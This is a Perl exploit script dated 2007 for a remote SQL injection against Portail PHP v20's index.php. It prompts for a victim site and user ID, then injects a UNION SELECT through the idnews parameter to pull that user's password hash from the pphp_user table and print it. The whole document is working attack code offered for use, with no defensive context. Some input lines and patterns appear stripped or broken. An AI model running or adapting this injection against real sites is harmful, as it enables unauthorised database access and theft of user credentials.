use LWP::Simple; print " Exploit Coded (c) by xoron Portail PHP v20 (index.php) Remote SQL Injection Exploit Languages: Turkish, English Plz Select Language:"; $dil = ; %eng = ( "site" => "Enter The Victim Without http://:", "path" => "Plz Select Path:", "id" => "Plz Select User ID:" ); %turk = ( "site" => "Site Adi http:// ile baslayan:", "path" => "Dizin:", "id" => "ID: " ); if($dil=~/^turkish$/i){ %dil = %turk; } elsif($dil=~/^english$/i){ %dil = %eng; } else{print "Undefined Language"; exit} print $dil{site}; chop($site=); $site = "http://$site" if !($site=~/^http/); print $dil{path}; chop($dir=); $dir = "/portailphp/" if !$dir; print $dil{id}; chop($id =); $id = 2 if !$id; print "Connecting to $site\n"; $sql = "index.php?affiche=Comment&act=lire&idnews=-1/**/union/**/select/**/0,"; $sql .= "1,2,US_pwd,4,5,6,7,8,9,10/**/from/**/pphp_user/**/where/**/US_uid=$id/*"; $get = get("$site$dir$sql"); if($get){ if($get=~/\ \;\ \;(.*?)<\/strong>/){ print "You are very Lucky Boy\nI Got Hash 4 ya\nID: $id\nHash: $1"; exit } elsif($get=~/(.*?)<\/strong>/){ print "Yep I got hash 4 ya\nID: $id\nHash: $1\n"; exit; } else{print "Exploit Failed\n";exit} } print "Connect Failed to $site\n"; exit; # [2007-03-22]